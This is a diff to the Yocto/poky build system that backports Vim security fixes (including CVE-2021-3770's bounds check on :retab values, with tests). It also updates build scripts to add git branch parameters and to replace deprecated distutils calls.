b/poky/meta/recipes-support/vim/files/b7081e135a16091c93f6f5f7525a5c58fb7ca9f9.patch new file mode 100644 index 0000000000..1cee759502 --- /dev/null +++ b/poky/meta/recipes-support/vim/files/b7081e135a16091c93f6f5f7525a5c58fb7ca9f9.patch @@ -0,0 +1,207 @@ +From b7081e135a16091c93f6f5f7525a5c58fb7ca9f9 Mon Sep 17 00:00:00 2001 +From: Bram Moolenaar +Date: Sat, 4 Sep 2021 18:47:28 +0200 +Subject: [PATCH] patch 8.2.3402: invalid memory access when using :retab with + large value + +Problem: Invalid memory access when using :retab with large value. +Solution: Check the number is positive. + +CVE: CVE-2021-3770 +Signed-off-by: Richard Purdie +Upstream-Status: Backport [https://github.com/vim/vim/commit/b7081e135a16091c93f6f5f7525a5c58fb7ca9f9] +--- + src/indent.c | 34 +++++++++++++++++++++------------- + src/option.c | 12 ++++++------ + src/optionstr.c | 4 ++-- + src/testdir/test_retab.vim | 3 +++ + src/version.c | 2 ++ + 5 files changed, 34 insertions(+), 21 deletions(-) + +Index: git/src/indent.c +=================================================================== +--- git.orig/src/indent.c ++++ git/src/indent.c +@@ -18,18 +18,19 @@ + /* + * Set the integer values corresponding to the string setting of 'vartabstop'. + * "array" will be set, caller must free it if needed. ++ * Return FAIL for an error. + */ + int + tabstop_set(char_u *var, int **array) + { +- int valcount = 1; +- int t; +- char_u *cp; ++ int valcount = 1; ++ int t; ++ char_u *cp; + + if (var[0] == NUL || (var[0] == '0' && var[1] == NUL)) + { + *array = NULL; +- return TRUE; ++ return OK; + } + + for (cp = var; *cp != NUL; ++cp) +@@ -43,8 +44,8 @@ tabstop_set(char_u *var, int **array) + if (cp != end) + emsg(_(e_positive)); + else +- emsg(_(e_invarg)); +- return FALSE; ++ semsg(_(e_invarg2), cp); ++ return FAIL; + } + } + +@@ -55,26 +56,33 @@ tabstop_set(char_u *var, int **array) + ++valcount; + continue; + } +- emsg(_(e_invarg)); +- return FALSE; ++ semsg(_(e_invarg2), var); ++ return FAIL; + } + + *array = ALLOC_MULT(int, valcount + 1); + if (*array == NULL) +- return FALSE; ++ return FAIL; + (*array)[0] = valcount; + + t = 1; + for (cp = var; *cp != NUL;) + { +- (*array)[t++] = atoi((char *)cp); +- while (*cp != NUL && *cp != ',') ++ int n = atoi((char *)cp); ++ ++ if (n < 0 || n > 9999) ++ { ++ semsg(_(e_invarg2), cp); ++ return FAIL; ++ } ++ (*array)[t++] = n; ++ while (*cp != NUL && *cp != ',') + ++cp; + if (*cp != NUL) + ++cp; + } + +- return TRUE; ++ return OK; + } + + /* +@@ -1556,7 +1564,7 @@ ex_retab(exarg_T *eap) + + #ifdef FEAT_VARTABS + new_ts_str = eap->arg; +- if (!tabstop_set(eap->arg, &new_vts_array)) ++ if (tabstop_set(eap->arg, &new_vts_array) == FAIL) + return; + while (vim_isdigit(*(eap->arg)) || *(eap->arg) == ',') + ++(eap->arg); +Index: git/src/option.c +=================================================================== +--- git.orig/src/option.c ++++ git/src/option.c +@@ -2292,9 +2292,9 @@ didset_options2(void) + #endif + #ifdef FEAT_VARTABS + vim_free(curbuf->b_p_vsts_array); +- tabstop_set(curbuf->b_p_vsts, &curbuf->b_p_vsts_array); ++ (void)tabstop_set(curbuf->b_p_vsts, &curbuf->b_p_vsts_array); + vim_free(curbuf->b_p_vts_array); +- tabstop_set(curbuf->b_p_vts, &curbuf->b_p_vts_array); ++ (void)tabstop_set(curbuf->b_p_vts, &curbuf->b_p_vts_array); + #endif + } + +@@ -5756,7 +5756,7 @@ buf_copy_options(buf_T *buf, int flags) + buf->b_p_vsts = vim_strsave(p_vsts); + COPY_OPT_SCTX(buf, BV_VSTS); + if (p_vsts && p_vsts != empty_option) +- tabstop_set(p_vsts, &buf->b_p_vsts_array); ++ (void)tabstop_set(p_vsts, &buf->b_p_vsts_array); + else + buf->b_p_vsts_array = 0; + buf->b_p_vsts_nopaste = p_vsts_nopaste +@@ -5914,7 +5914,7 @@ buf_copy_options(buf_T *buf, int flags) + buf->b_p_isk = save_p_isk; + #ifdef FEAT_VARTABS + if (p_vts && p_vts != empty_option && !buf->b_p_vts_array) +- tabstop_set(p_vts, &buf->b_p_vts_array); ++ (void)tabstop_set(p_vts, &buf->b_p_vts_array); + else + buf->b_p_vts_array = NULL; + #endif +@@ -5929,7 +5929,7 @@ buf_copy_options(buf_T *buf, int flags) + buf->b_p_vts = vim_strsave(p_vts); + COPY_OPT_SCTX(buf, BV_VTS); + if (p_vts && p_vts != empty_option && !buf->b_p_vts_array) +- tabstop_set(p_vts, &buf->b_p_vts_array); ++ (void)tabstop_set(p_vts, &buf->b_p_vts_array); + else + buf->b_p_vts_array = NULL; + #endif +@@ -6634,7 +6634,7 @@ paste_option_changed(void) + if (buf->b_p_vsts_array) + vim_free(buf->b_p_vsts_array); + if (buf->b_p_vsts && buf->b_p_vsts != empty_option) +- tabstop_set(buf->b_p_vsts, &buf->b_p_vsts_array); ++ (void)tabstop_set(buf->b_p_vsts, &buf->b_p_vsts_array); + else + buf->b_p_vsts_array = 0; + #endif +Index: git/src/optionstr.c +=================================================================== +--- git.orig/src/optionstr.c ++++ git/src/optionstr.c +@@ -2166,7 +2166,7 @@ did_set_string_option( + if (errmsg == NULL) + { + int *oldarray = curbuf->b_p_vsts_array; +- if (tabstop_set(*varp, &(curbuf->b_p_vsts_array))) ++ if (tabstop_set(*varp, &(curbuf->b_p_vsts_array)) == OK) + { + if (oldarray) + vim_free(oldarray); +@@ -2205,7 +2205,7 @@ did_set_string_option( + { + int *oldarray = curbuf->b_p_vts_array; + +- if (tabstop_set(*varp, &(curbuf->b_p_vts_array))) ++ if (tabstop_set(*varp, &(curbuf->b_p_vts_array)) == OK) + { + vim_free(oldarray); + #ifdef FEAT_FOLDING +Index: git/src/testdir/test_retab.vim +=================================================================== +--- git.orig/src/testdir/test_retab.vim ++++ git/src/testdir/test_retab.vim +@@ -74,4 +74,7 @@ endfunc + func Test_retab_error() + call assert_fails('retab -1', 'E487:') + call assert_fails('retab! -1', 'E487:') ++ call assert_fails('ret -1000', 'E487:') ++ call assert_fails('ret 10000', 'E475:') ++ call assert_fails('ret 80000000000000000000', 'E475:') + endfunc +Index: git/src/version.c +=================================================================== +--- git.orig/src/version.c ++++ git/src/version.c +@@ -743,6 +743,8 @@ static char *(features[]) = + static int included_patches[] = + { /* Add new patch number below this line */ + /**/ ++ 3402, ++/**/ + 0 + }; + diff --git a/poky/meta/recipes-support/vim/vim.inc b/poky/meta/recipes-support/vim/vim.inc index 878d0f18ae..51a6861325 100644 --- a/poky/meta/recipes-support/vim/vim.inc +++ b/poky/meta/recipes-support/vim/vim.inc @@ -11,18 +11,32 @@ RSUGGESTS_${PN} = "diffutils" LICENSE = "vim" LIC_FILES_CHKSUM = "file://runtime/doc/uganda.txt;endline=287;md5=a19edd7ec70d573a005d9e509375a99a" -SRC_URI = "git://github.com/vim/vim.git \ +SRC_URI = "git://github.com/vim/vim.git;branch=master;protocol=https \ file://disable_acl_header_check.patch \ file://vim-add-knob-whether-elf.h-are-checked.patch \ file://0001-src-Makefile-improve-reproducibility.patch \ file://no-path-adjust.patch \ file://racefix.patch \ -" + file://b7081e135a16091c93f6f5f7525a5c58fb7ca9f9.patch \ + file://CVE-2021-3778.patch \ + file://0002-patch-8.2.3428-using-freed-memory-when-replacing.patch \ + file://0003-patch-8.2.3487-illegal-memory-access-if-buffer-name-.patch \ + file://0004-patch-8.2.3489-ml_get-error-after-search-with-range.patch \ + file://0005-patch-8.2.3564-invalid-memory-access-when-scrolling-.patch \ + file://0001-patch-8.2.3581-reading-character-past-end-of-line.patch \ + file://0002-patch-8.2.3582-reading-uninitialized-memory-when-giv.patch \ + file://0002-patch-8.2.3611-crash-when-using-CTRL-W-f-without-fin.patch \ + file://CVE-2021-4069.patch \ + " + SRCREV = "98056533b96b6b5d8849641de93185dd7bcadc44" # Do not consider .z in x.y.z, as that is updated with every commit UPSTREAM_CHECK_GITTAGREGEX = "(?P\d+\.\d+)\.0" +# CVE-2021-3968 is related to an issue which was introduced after 8.2, this can be removed after 8.3. +CVE_CHECK_WHITELIST += "CVE-2021-3968" + S = "${WORKDIR}/git" VIMDIR = "vim${@d.getVar('PV').split('.')[0]}${@d.getVar('PV').split('.')[1]}" @@ -54,11 +68,12 @@ do_compile() { autotools_do_compile } -#Available PACKAGECONFIG options are gtkgui, acl, x11, tiny +#Available PACKAGECONFIG options are gtkgui, acl, x11, tiny selinux, elfutils, nls PACKAGECONFIG ??= "" PACKAGECONFIG += " \ ${@bb.utils.filter('DISTRO_FEATURES', 'acl selinux', d)} \ ${@bb.utils.contains('DISTRO_FEATURES', 'x11', 'x11 gtkgui', '', d)} \ + nls \ " PACKAGECONFIG[gtkgui] = "--enable-gui=gtk3,--enable-gui=no,gtk+3" @@ -67,6 +82,7 @@ PACKAGECONFIG[x11] = "--with-x,--without-x,xt," PACKAGECONFIG[tiny] = "--with-features=tiny,--with-features=big,," PACKAGECONFIG[selinux] = "--enable-selinux,--disable-selinux,libselinux," PACKAGECONFIG[elfutils] = "--enable-elf-check,,elfutils," +PACKAGECONFIG[nls] = "--enable-nls,--disable-nls,," EXTRA_OECONF = " \ --disable-gpm \ diff --git a/poky/scripts/buildhistory-diff b/poky/scripts/buildhistory-diff index 833f7c33a5..02eedafd6e 100755 --- a/poky/scripts/buildhistory-diff +++ b/poky/scripts/buildhistory-diff @@ -11,7 +11,6 @@ import sys import os import argparse -from distutils.version import LooseVersion # Ensure PythonGit is installed (buildhistory_analysis needs it) try: @@ -71,10 +70,6 @@ def main(): parser = get_args_parser() args = parser.parse_args() - if LooseVersion(git.__version__) < '0.3.1': - sys.stderr.write("Version of GitPython is too old, please install GitPython (python-git) 0.3.1 or later in order to use this script\n") - sys.exit(1) - if len(args.revisions) > 2: sys.stderr.write('Invalid argument(s) specified: %s\n\n' % ' '.join(args.revisions[2:])) parser.print_help() diff --git a/poky/scripts/contrib/convert-srcuri.py b/poky/scripts/contrib/convert-srcuri.py new file mode 100755 index 0000000000..5b362ea2e8 --- /dev/null +++ b/poky/scripts/contrib/convert-srcuri.py @@ -0,0 +1,77 @@ +#!/usr/bin/env python3 +# +# Conversion script to update SRC_URI to add branch to git urls +# +# Copyright (C) 2021 Richard Purdie +# +# SPDX-License-Identifier: GPL-2.0-only +# + +import re +import os +import sys +import tempfile +import shutil +import mimetypes + +if len(sys.argv) < 2: + print("Please specify a directory to run the conversion script against.") + sys.exit(1) + +def processfile(fn): + def matchline(line): + if "MIRROR" in line or ".*" in line or "GNOME_GIT" in line: + return False + return True + print("processing file '%s'" % fn) + try: + if "distro_alias.inc" in fn or "linux-yocto-custom.bb" in fn: + return + fh, abs_path = tempfile.mkstemp() + modified = False + with os.fdopen(fh, 'w') as new_file: + with open(fn, "r") as old_file: + for line in old_file: + if ("git://" in line or "gitsm://" in line) and "branch=" not in line and matchline(line): + if line.endswith('"\n'): + line = line.replace('"\n', ';branch=master"\n') + elif line.endswith(" \\\n"): + line = line.replace(' \\\n', ';branch=master \\\n') + modified = True + if ("git://" in line or "gitsm://" in line) and "github.com" in line and "protocol=https" not in line and matchline(line): + if "protocol=git" in line: + line = line.replace('protocol=git', 'protocol=https') + elif line.endswith('"\n'): + line = line.replace('"\n', ';protocol=https"\n') + elif line.endswith(" \\\n"): + line = line.replace(' \\\n', ';protocol=https \\\n') + modified = True + new_file.write(line) + if modified: + shutil.copymode(fn, abs_path) + os.remove(fn) + shutil.move(abs_path, fn) + except UnicodeDecodeError: + pass + +ourname = os.path.basename(sys.argv[0]) +ourversion = "0.1" + +if os.path.isfile(sys.argv[1]): + processfile(sys.argv[1]) + sys.exit(0) + +for targetdir in sys.argv[1:]: + print("processing directory '%s'" % targetdir) + for root, dirs, files in os.walk(targetdir): + for name in files: + if name == ourname: + continue + fn = os.path.join(root, name) + if os.path.islink(fn): + continue + if "/.git/" in fn or fn.endswith(".html") or fn.endswith(".patch") or fn.endswith(".m4") or fn.endswith(".diff"): + continue + processfile(fn) + +print("All files processed with version %s" % ourversion) diff --git a/poky/scripts/lib/checklayer/cases/common.py b/poky/scripts/lib/checklayer/cases/common.py index b82304e361..4495f71b24 100644 --- a/poky/scripts/lib/checklayer/cases/common.py +++ b/poky/scripts/lib/checklayer/cases/common.py @@ -14,7 +14,7 @@ class CommonCheckLayer(OECheckLayerTestCase): # The top-level README file may have a suffix (like README.rst or README.txt). readme_files = glob.glob(os.path.join(self.tc.layer['path'], '[Rr][Ee][Aa][Dd][Mm][Ee]*')) self.assertTrue(len(readme_files) > 0, - msg="Layer doesn't contains README file.") + msg="Layer doesn't contain a README file.") # There might be more than one file matching the file pattern above # (for example, README.rst and README-COPYING.rst). The one with the shortest diff --git a/poky/scripts/lib/recipetool/create.py b/poky/scripts/lib/recipetool/create.py index 566c75369a..5b6ac12a92 100644 --- a/poky/scripts/lib/recipetool/create.py +++ b/poky/scripts/lib/recipetool/create.py @@ -478,6 +478,9 @@ def create_recipe(args): storeTagName = params['tag'] params['nobranch'] = '1' del params['tag'] + # Assume 'master' branch if not set + if scheme in ['git', 'gitsm'] and 'branch' not in params and 'nobranch' not in params: + params['branch'] = 'master' fetchuri = bb.fetch2.encodeurl((scheme, network, path, user, passwd, params)) tmpparent = tinfoil.config_data.getVar('BASE_WORKDIR') @@ -527,10 +530,9 @@ def create_recipe(args): # Remove HEAD reference point and drop remote prefix get_branch = [x.split('/', 1)[1] for x in get_branch if not x.startswith('origin/HEAD')] if 'master' in get_branch: - # If it is master, we do not need to append 'branch=master' as this is default. # Even with the case where get_branch has multiple objects, if 'master' is one # of them, we should default take from 'master' - srcbranch = '' + srcbranch = 'master' elif len(get_branch) == 1: # If 'master' isn't in get_branch and get_branch contains only ONE object, then store result into 'srcbranch' srcbranch = get_branch[0] @@ -543,8 +545,8 @@ def create_recipe(args): # Since we might have a value in srcbranch, we need to # recontruct the srcuri to include 'branch' in params. scheme, network, path, user, passwd, params = bb.fetch2.decodeurl(srcuri) - if srcbranch: - params['branch'] = srcbranch + if scheme in ['git', 'gitsm']: + params['branch'] = srcbranch or 'master' if storeTagName and scheme in ['git', 'gitsm']: # Check srcrev using tag and check validity of the tag @@ -603,7 +605,7 @@ def create_recipe(args): splitline = line.split() if len(splitline) > 1: if splitline[0] == 'origin' and scriptutils.is_src_url(splitline[1]): - srcuri = reformat_git_uri(splitline[1]) + srcuri = reformat_git_uri(splitline[1]) + ';branch=master' srcsubdir = 'git' break diff --git a/poky/scripts/lib/scriptutils.py b/poky/scripts/lib/scriptutils.py index f92255d8dc..47a08194d0 100644 --- a/poky/scripts/lib/scriptutils.py +++ b/poky/scripts/lib/scriptutils.py @@ -18,7 +18,8 @@ import sys import tempfile import threading import importlib -from importlib import machinery +import importlib.machinery +import importlib.util class KeepAliveStreamHandler(logging.StreamHandler): def __init__(self, keepalive=True, **kwargs): @@ -82,7 +83,9 @@ def load_plugins(logger, plugins, pluginpath): logger.debug('Loading plugin %s' % name) spec = importlib.machinery.PathFinder.find_spec(name, path=[pluginpath] ) if spec: - return spec.loader.load_module() + mod = importlib.util.module_from_spec(spec) + spec.loader.exec_module(mod) + return mod def plugin_name(filename): return os.path.splitext(os.path.basename(filename))[0] @@ -215,7 +218,8 @@ def fetch_url(tinfoil, srcuri, srcrev, destdir, logger, preserve_tmp=False, mirr pathvars = ['T', 'RECIPE_SYSROOT', 'RECIPE_SYSROOT_NATIVE'] for pathvar in pathvars: path = rd.getVar(pathvar) - shutil.rmtree(path) + if os.path.exists(path): + shutil.rmtree(path) finally: if fetchrecipe: try: diff --git a/poky/scripts/lib/wic/engine.py b/poky/scripts/lib/wic/engine.py index 9ff4394757..7dbde85696 100644 --- a/poky/scripts/lib/wic/engine.py +++ b/poky/scripts/lib/wic/engine.py @@ -19,10 +19,10 @@ import os import tempfile import json import subprocess +import shutil import re from collections import namedtuple, OrderedDict -from distutils.spawn import find_executable from wic import WicError from wic.filemap import sparse_copy @@ -245,7 +245,7 @@ class Disk: for path in pathlist.split(':'): self.paths = "%s%s:%s" % (native_sysroot, path, self.paths) - self.parted = find_executable("parted", self.paths) + self.parted = shutil.which("parted", path=self.paths) if not self.parted: raise WicError("Can't find executable parted") @@ -283,7 +283,7 @@ class Disk: "resize2fs", "mkswap", "mkdosfs", "debugfs"): aname = "_%s" % name if aname not in self.__dict__: - setattr(self, aname, find_executable(name, self.paths)) + setattr(self, aname, shutil.which(name, path=self.paths)) if aname not in self.__dict__ or self.__dict__[aname] is None: raise WicError("Can't find executable '{}'".format(name)) return self.__dict__[aname] diff --git a/poky/scripts/lib/wic/help.py b/poky/scripts/lib/wic/help.py index 62a2a90e79..fcace95ff4 100644 --- a/poky/scripts/lib/wic/help.py +++ b/poky/scripts/lib/wic/help.py @@ -840,8 +840,8 @@ DESCRIPTION meanings. The commands are based on the Fedora kickstart documentation but with modifications to reflect wic capabilities. - http://fedoraproject.org/wiki/Anaconda/Kickstart#part_or_partition - http://fedoraproject.org/wiki/Anaconda/Kickstart#bootloader + https://pykickstart.readthedocs.io/en/latest/kickstart-docs.html#part-or-partition + https://pykickstart.readthedocs.io/en/latest/kickstart-docs.html#bootloader Commands diff --git a/poky/scripts/lib/wic/misc.py b/poky/scripts/lib/wic/misc.py index 8fb508dd39..3e11822996 100644 --- a/poky/scripts/lib/wic/misc.py +++ b/poky/scripts/lib/wic/misc.py @@ -16,9 +16,9 @@ import logging import os import re import subprocess +import shutil from collections import defaultdict -from distutils import spawn from wic import WicError @@ -46,7 +46,8 @@ NATIVE_RECIPES = {"bmaptool": "bmap-tools", "parted": "parted", "sfdisk": "util-linux", "sgdisk": "gptfdisk", - "syslinux": "syslinux" + "syslinux": "syslinux", + "tar": "tar" } def runtool(cmdln_or_args): @@ -113,6 +114,15 @@ def exec_cmd(cmd_and_args, as_shell=False): """ return _exec_cmd(cmd_and_args, as_shell)[1] +def find_executable(cmd, paths): + recipe = cmd + if recipe in NATIVE_RECIPES: + recipe = NATIVE_RECIPES[recipe] + provided = get_bitbake_var("ASSUME_PROVIDED") + if provided and "%s-native" % recipe in provided: + return True + + return shutil.which(cmd, path=paths) def exec_native_cmd(cmd_and_args, native_sysroot, pseudo=""): """ @@ -141,7 +151,7 @@ def exec_native_cmd(cmd_and_args, native_sysroot, pseudo=""): logger.debug("exec_native_cmd: %s", native_cmd_and_args) # If the command isn't in the native sysroot say we failed. - if spawn.find_executable(args[0], native_paths): + if find_executable(args[0], native_paths): ret, out = _exec_cmd(native_cmd_and_args, True) else: ret = 127 diff --git a/poky/scripts/lib/wic/partition.py b/poky/scripts/lib/wic/partition.py index 85f9847047..792bb3dcd3 100644 --- a/poky/scripts/lib/wic/partition.py +++ b/poky/scripts/lib/wic/partition.py @@ -104,7 +104,7 @@ class Partition(): extra_blocks = self.extra_space rootfs_size = actual_rootfs_size + extra_blocks - rootfs_size *= self.overhead_factor + rootfs_size = int(rootfs_size * self.overhead_factor) logger.debug("Added %d extra blocks to %s to get to %d total blocks", extra_blocks, self.mountpoint, rootfs_size) diff --git a/poky/scripts/lib/wic/pluginbase.py b/poky/scripts/lib/wic/pluginbase.py index d9b4e57747..b64568339b 100644 --- a/poky/scripts/lib/wic/pluginbase.py +++ b/poky/scripts/lib/wic/pluginbase.py @@ -9,9 +9,11 @@ __all__ = ['ImagerPlugin', 'SourcePlugin'] import os import logging +import types from collections import defaultdict -from importlib.machinery import SourceFileLoader +import importlib +import importlib.util from wic import WicError from wic.misc import get_bitbake_var @@ -54,7 +56,9 @@ class PluginMgr: mname = fname[:-3] mpath = os.path.join(ppath, fname) logger.debug("loading plugin module %s", mpath) - SourceFileLoader(mname, mpath).load_module() + spec = importlib.util.spec_from_file_location(mname, mpath) + module = importlib.util.module_from_spec(spec) + spec.loader.exec_module(module) return PLUGINS.get(ptype) diff --git a/poky/scripts/lib/wic/plugins/imager/direct.py b/poky/scripts/lib/wic/plugins/imager/direct.py index 7e1c1c03ab..2505c13fce 100644 --- a/poky/scripts/lib/wic/plugins/imager/direct.py +++ b/poky/scripts/lib/wic/plugins/imager/direct.py @@ -115,7 +115,7 @@ class DirectPlugin(ImagerPlugin): updated = False for part in self.parts: if not part.realnum or not part.mountpoint \ - or part.mountpoint == "/": + or part.mountpoint == "/" or not part.mountpoint.startswith('/'): continue if part.use_uuid: diff --git a/poky/scripts/lib/wic/plugins/source/bootimg-pcbios.py b/poky/scripts/lib/wic/plugins/source/bootimg-pcbios.py index f2639e7004..32e47f1831 100644 --- a/poky/scripts/lib/wic/plugins/source/bootimg-pcbios.py +++ b/poky/scripts/lib/wic/plugins/source/bootimg-pcbios.py @@ -186,8 +186,10 @@ class BootimgPcbiosPlugin(SourcePlugin): # dosfs image, created by mkdosfs bootimg = "%s/boot%s.img" % (cr_workdir, part.lineno) - dosfs_cmd = "mkdosfs -n boot -i %s -S 512 -C %s %d" % \ - (part.fsuuid, bootimg, blocks) + label = part.label if part.label else "boot" + + dosfs_cmd = "mkdosfs -n %s -i %s -S 512 -C %s %d" % \ + (label, part.fsuuid, bootimg, blocks) exec_native_cmd(dosfs_cmd, native_sysroot) mcopy_cmd = "mcopy -i %s -s %s/* ::/" % (bootimg, hdddir) diff --git a/poky/scripts/oe-pkgdata-browser b/poky/scripts/oe-pkgdata-browser index 8d223185a4..65a6ee956e 100755 --- a/poky/scripts/oe-pkgdata-browser +++ b/poky/scripts/oe-pkgdata-browser @@ -236,6 +236,8 @@ class PkgUi(): update_deps("RPROVIDES", "Provides: ", self.provides_label, clickable=False) def load_recipes(self): + if not os.path.exists(pkgdata): + sys.exit("Error: Please ensure %s exists by generating packages before using this tool." % pkgdata) for recipe in sorted(os.listdir(pkgdata)): if os.path.isfile(os.path.join(pkgdata, recipe)): self.recipe_iters[recipe] = self.recipe_store.append([recipe]) diff --git a/poky/scripts/pybootchartgui/pybootchartgui/draw.py b/poky/scripts/pybootchartgui/pybootchartgui/draw.py index 29eb7505bc..fc708b55c3 100644 --- a/poky/scripts/pybootchartgui/pybootchartgui/draw.py +++ b/poky/scripts/pybootchartgui/pybootchartgui/draw.py @@ -267,7 +267,10 @@ def draw_chart(ctx, color, fill, chart_bounds, data, proc_tree, data_range): # avoid divide by zero if max_y == 0: max_y = 1.0 - xscale = float (chart_bounds[2]) / (max_x - x_shift) + if (max_x - x_shift): + xscale = float (chart_bounds[2]) / (max_x - x_shift) + else: + xscale = float (chart_bounds[2]) # If data_range is given, scale the chart so that the value range in # data_range matches the chart bounds exactly. # Otherwise, scale so that the actual data matches the chart bounds. diff --git a/poky/scripts/runqemu b/poky/scripts/runqemu index 10880ba6bb..51607f10e5 100755 --- a/poky/scripts/runqemu +++ b/poky/scripts/runqemu @@ -1516,7 +1516,8 @@ def main(): def sigterm_handler(signum, frame): logger.info("SIGTERM received") - os.kill(config.qemupid, signal.SIGTERM) + if config.qemupid: + os.kill(config.qemupid, signal.SIGTERM) config.cleanup() # Deliberately ignore the return code of 'tput smam'. subprocess.call(["tput", "smam"]) diff --git a/poky/scripts/wic b/poky/scripts/wic index a741aed364..6547abe0e9 100755 --- a/poky/scripts/wic +++ b/poky/scripts/wic @@ -22,9 +22,9 @@ import sys import argparse import logging import subprocess +import shutil from collections import namedtuple -from distutils import spawn # External modules scripts_path = os.path.dirname(os.path.realpath(__file__)) @@ -47,7 +47,7 @@ if os.environ.get('SDKTARGETSYSROOT'): break sdkroot = os.path.dirname(sdkroot) -bitbake_exe = spawn.find_executable('bitbake') +bitbake_exe = shutil.which('bitbake') if bitbake_exe: bitbake_path = scriptpath.add_bitbake_lib_path() import bb -- cgit v1.2.3